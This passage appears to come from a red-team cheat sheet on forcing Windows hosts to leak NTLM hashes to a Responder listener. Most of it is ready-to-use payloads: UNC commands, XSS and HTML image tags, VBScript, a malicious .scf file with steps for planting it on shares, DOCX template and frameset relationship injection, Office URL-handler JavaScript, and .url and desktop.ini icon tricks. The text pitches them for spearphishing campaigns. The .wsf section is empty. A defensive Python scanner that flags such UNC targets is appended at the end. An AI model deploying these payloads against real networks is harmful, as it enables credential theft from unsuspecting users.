elicit an authentication action. Below are some methods and references for learning more, to use in your next Red Team spearphish campaign, rogue website, or document.

## WINDOWS COMMANDS

Various Windows commands can elicit an NTLMv1/v2 authentication leak. Their usefulness in an actual scenario I'll leave up to the user.

```cmd
C:\> dir \\<Responder_IPAddr>\C$
C:\> regsvr32 /s /u /i://<Responder_IPAddr>/blah example.dll
C:\> echo 1 > //<Responder_IPAddr>/blah
C:\> pushd \\<Responder_IPAddr>\C$\blah
C:\> cmd /k \\<Responder_IPAddr>\C$\blah
C:\> cmd /c \\<Responder_IPAddr>\C$\blah
C:\> start \\<Responder_IPAddr>\C$\blah
C:\> mkdir \\<Responder_IPAddr>\C$\blah
C:\> type \\<Responder_IPAddr>\C$\blah
```

## POWERSHELL COMMANDS

Various Windows PowerShell commands can elicit an NTLMv1/v2 authentication leak. Their usefulness in a scenario I'll leave up to the user.

```powershell
PS> Invoke-Item \\<Responder_IPAddr>\C$\blah
PS> Get-Content \\<Responder_IPAddr>\C$\blah
PS> Start-Process \\<Responder_IPAddr>\C$\blah
```

## INTERNET EXPLORER & EDGE BROWSERS

Maliciously hosted img source references can cause browsers to leak NTLMv1/v2 hash responses when retrieving the image file.

example.htm:

```html
<!DOCTYPE html>
<html>
<img src="file://<Responder_IPAddr>/path/example.png"/>
</html>
```

## XSS INJECTION

If you can pull off an XSS injection you can insert the below to have Internet Explorer browsers leak an NTLMv1/v2 hash.

```html
<img src="\\\\<Responder_IPAddr>\\path\example.png">
```

## VBSCRIPT

You can insert VBScript references into webpages, however this only works against Internet Explorer browsers.

```html
<html>
<script type="text/vbscript">
<!--
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//<Responder_IPAddr>/blah", 1)
-->
</script>
</html>
```

## SCF FILE

SCENARIO: You have user creds or the ability to write a file to an unauthenticated Windows share on the target network.
Now you can craft a malicious SCF file and place it in a frequented location on the fileshare to collect the NTLMv1/NTLMv2 hashes of users who browse the share with Windows Explorer.

STEP 1: Create an .scf text file named '@InvoiceReqs.scf', insert the text below, and place it in what appears to be a frequently visited location on the share. The file needs to be viewed by Windows Explorer, so ensure the filename forces it to sort near the top of the targeted share/directory:

```ini
[Shell]
Command=2
IconFile=\\<Responder_IPAddr>\share\test.ico
[Taskbar]
Command=ToggleDesktop
```

STEP 2: Start Responder to listen and capture any users that browse the fileshare location:

```bash
python Responder.py -wrf --lm -v -I <interface>
```

## OFFICE DOCUMENTS SETTINGS.XML.RELS

You can set external content in DOCX files via the template file, which you can view/edit with 7zip, located at C:\example.docx\word\_rels\settings.xml.rels.

!!CAVEAT!! If the file is opened in Protected View (i.e. it was emailed or hosted on a website) this trick will not work.

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://<Responder_IPAddr>/example/Template.dotx" TargetMode="External"/>
</Relationships>
```

## FRAMESETS WEBSETTINGS.XML.RELS

Microsoft documents can support web-editing and therefore frameset HTML elements can be added. This can be abused to link a Word document to a UNC path.

STEP 1: First we will need to create a malicious Word DOCX file and then extract/open it with 7zip to view the XML file structures inside.

STEP 2: Under the extracted path C:\example.docx\word\webSettings.xml, add the frameset below to the 'webSettings.xml' file, creating a link to another file via r:id="nEtMuxl". Save this file back when edited.
```xml
<w:frameset>
  <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
  </w:framesetSplitbar>
  <w:frameset>
    <w:frame>
      <w:name w:val="3"/>
      <w:sourceFileName r:id="nEtMuxl"/>
      <w:linkedToFile/>
    </w:frame>
  </w:frameset>
</w:frameset>
```

STEP 3: Create a new file 'webSettings.xml.rels' and save it under the path C:\example.docx\word\_rels\webSettings.xml.rels with the Relationship Id 'nEtMuxl' we created earlier. We will also insert our Responder location in the Target value.

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="nEtMuxl" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\<Responder_IPAddr>\Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>
```

STEP 4: Once your target opens this file it will attempt to call out to the external content resource via the frameset.

## URL HANDLERS

Abusing custom URL schemes registered by Microsoft Office to open a file from a UNC path causes the leakage of NTLMv1/v2 hashes.

Scheme names:

```
ms-word:
ms-powerpoint:
ms-excel:
ms-visio:
ms-access:
ms-project:
ms-publisher:
ms-spd:
ms-infopath:
```

```html
<!DOCTYPE html>
<html>
<script>
location.href = 'ms-word:ofe|u|\\<Responder_IPAddr>\path\example.docx';
</script>
</html>
```

## INTERNET SHORTCUTS .URL FILE

Simply create a malicious shortcut using a .url file to direct users to your listening Responder.

example.url:

```ini
[InternetShortcut]
URL=file://<Responder_IPAddr>/path/example.html
```

You can also reference an icon for your internet shortcut link file, so each time a user simply browses to or views the link, Windows will attempt to load the icon, leaking the NTLMv1/v2 hash.
example.url:

```ini
[InternetShortcut]
URL=https://netmux.com
IconIndex=0
IconResource=\\<Responder_IPAddr>\path\example.ico
```

## DESKTOP.INI FILE

You can also create a 'desktop.ini' file inside a directory with a malicious reference to the icon file. When the directory is viewed in Windows Explorer the system will try to resolve the icon reference:

desktop.ini:

```ini
[.ShellClassInfo]
IconResource=\\<Responder_IPAddr>\path\example.ico
```

## WINDOWS SCRIPT FILES

You can create a .wsf file and attempt to have a user run this script file, which will leak an NTLMv1/v2 authentication attempt.

example.wsf:

## REFERENCES

- Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180S0l/living-off-the-land_-stealing-netntlmhashes.html
- Capturing NetNTLM Hashes with Office (DOT) XML Documents: https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xmldocuments/
- Microsoft Office - NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
- Places of Interest in Stealing NetNTLM Hashes: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlmhashes/
- Bad-PDF: https://github.com/deepzec/Bad-Pdf, https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/, https://github.com/3gstudent/Worse-PDF
- Hashjacking - gif SMB hash: https://github.com/hob0/hashjacking
- From e-mail to NTLM hashes with Microsoft Outlook: https://wildfire.blazeinfosec.com/love-letters-from-the-red-team-from-e-mail-tontlm-hashes-with-microsoft-outlook/
- Leveraging web application vulnerabilities to steal NTLM hashes: https://blog.blazeinfosec.com/leveraging-web-application-vulnerabilities-tosteal-ntlm-hashes-2/
- SMB hash hijacking & user tracking in MS Outlook: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smbhash-hijacking-and-user-tracking-in-ms-outlook/
- SCF File: https://room362.com/post/2016/smb-http-auth-capture-via-scf/, https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
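As a defensive counterpart to the file-based techniques above (the .scf, .url and desktop.ini icon references, and the External Relationship entries in settings.xml.rels / webSettings.xml.rels), here is an added detection example that is not part of the original cheat sheet: it flags any such file whose icon, URL or relationship Target resolves to a UNC or file:// location, which is exactly what triggers the outbound NTLM authentication. The 192.0.2.10 address and the in-memory DOCX it builds are constructed test data, not from the page.

```python
import configparser
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Keys Windows resolves on its own when a folder is browsed or a shortcut is shown;
# a UNC or file:// value forces an SMB/WebDAV connection and an NTLM auth attempt.
ICON_KEYS = {"iconfile", "iconresource", "url"}
REMOTE_RE = re.compile(r"^(\\\\|//|file://)", re.IGNORECASE)
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def is_remote_target(value: str) -> bool:
    """True for a UNC path or file:// URL (remote icon, template or frame)."""
    return bool(REMOTE_RE.match(value.strip().strip('"')))

def scan_ini_text(text: str) -> list:
    """(section, key, value) for .scf/.url/desktop.ini entries that point off-host."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case for reporting
    cp.read_string(text)
    return [(s, k, v) for s in cp.sections() for k, v in cp.items(s)
            if k.lower() in ICON_KEYS and is_remote_target(v)]

def scan_docx(data: bytes) -> list:
    """(rels part, Id, Target) for every External relationship in a DOCX whose
    Target is a UNC path or file:// URL (attachedTemplate, frame, ...)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(zf.read(name)).iter(RELS_NS + "Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and is_remote_target(target):
                    hits.append((name, rel.get("Id"), target))
    return hits

def build_sample_docx() -> bytes:
    """Constructed minimal DOCX (rels part only) carrying the page's frameset
    relationship, with the documentation IP 192.0.2.10 as <Responder_IPAddr>."""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="nEtMuxl" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"'
            ' Target="\\\\192.0.2.10\\Microsoft_Office_Updates.docx" TargetMode="External"/>'
            '<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"'
            ' Target="https://example.com/" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/webSettings.xml.rels", rels)
    return buf.getvalue()
```

Run `scan_ini_text` over every .scf, .url and desktop.ini found on a share, and `scan_docx` over inbound Office attachments; an ordinary https hyperlink relationship is left alone, only UNC and file:// targets are reported.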
[[Home]] #howto